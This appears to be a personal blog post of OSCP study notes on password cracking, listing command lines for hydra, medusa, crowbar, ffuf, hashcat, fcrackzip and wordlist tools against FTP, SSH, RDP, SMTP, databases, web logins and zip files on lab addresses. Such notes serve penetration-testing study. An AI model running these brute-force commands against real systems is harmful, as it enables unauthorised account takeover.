Certification

OSCP notes dump: #CRACK

Philipp Fragstein

2 min read
Photo by Joost Crop / Unsplash

This is my last post covering notes taken during the OSCP exam preparation. Next time I'll cover different topics and I will also focus on the next certification Certified Red Team Operator ("CRTO").

Password cracking is an essential skill for ethical hackers, as it allows them to test and improve the security of password-protected systems. In this post, I will cover various password cracking methodologies, tools, and best practices, all grounded in the expert knowledge of the OSCP course. I'll provide a comprehensive overview of this crucial aspect of cybersecurity.

brute force

# crawler that extracts every word >= 6 digits to the file 
cewl www.meghacorpnone.com -m 6 -w megacorp-cewl.txt

# using john to extend list
$[0-9]$[0-9]
john --wordlist=list.txt --rules --stdout > mutated.txt

# create worldist with min 8, max 8 chars, beginnung with uppercase, then two times lowercase, two times special chars, three times numeric chars 
crunch 8 8 -t ,@@^^&%%%

# dictonary attack .htaccesss secured website
medusa -h <IP> -u admin -P rockyou.txt -M http -m DIR:/admin

# dictonary attack rdp 
crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1

# dictonary attack ftp
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 21 -o "/root/oscp/lab/results/10.11.1.226/scans/tcp_21_ftp_hydra.txt" ftp://10.11.1.226

# dictonary attack ssh
hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1

# dictonary attack smtp
hydra -L names -P /usr/share/wordlists/rockyou.txt 192.168.101.9 smtp

# dictonary attack mysql
hydra -L usernames.txt -P xxxxx.txt <ip> mysql

# dictonary attack mssql
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.128 mssql

# dictonary attack over http-post
hydra 10.11.0.22 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f

# dictonary attack http post 
hydra -l admin -P rockyou.txt  http-post-form “/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username”

# dictonary attack basic auth
hydra -l admin -P 1000_common_passwords.txt -s 8090 -f 192.168.1.4 http-get /get_camera_params.cgi

# brute force using exisiting request file
ffuf -request /root/test.txt -request-proto http -w rockyou.txt:FFUF -fr “error”

hashcat

# cracking hashes with hashcat
# https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat.exe -a0 -m3200 hashes.txt wordlists\rockyou.txt

frackzip

# crack zip file
fcrackzip -D -p /usr/share/wordlists/rockyou.txt encoded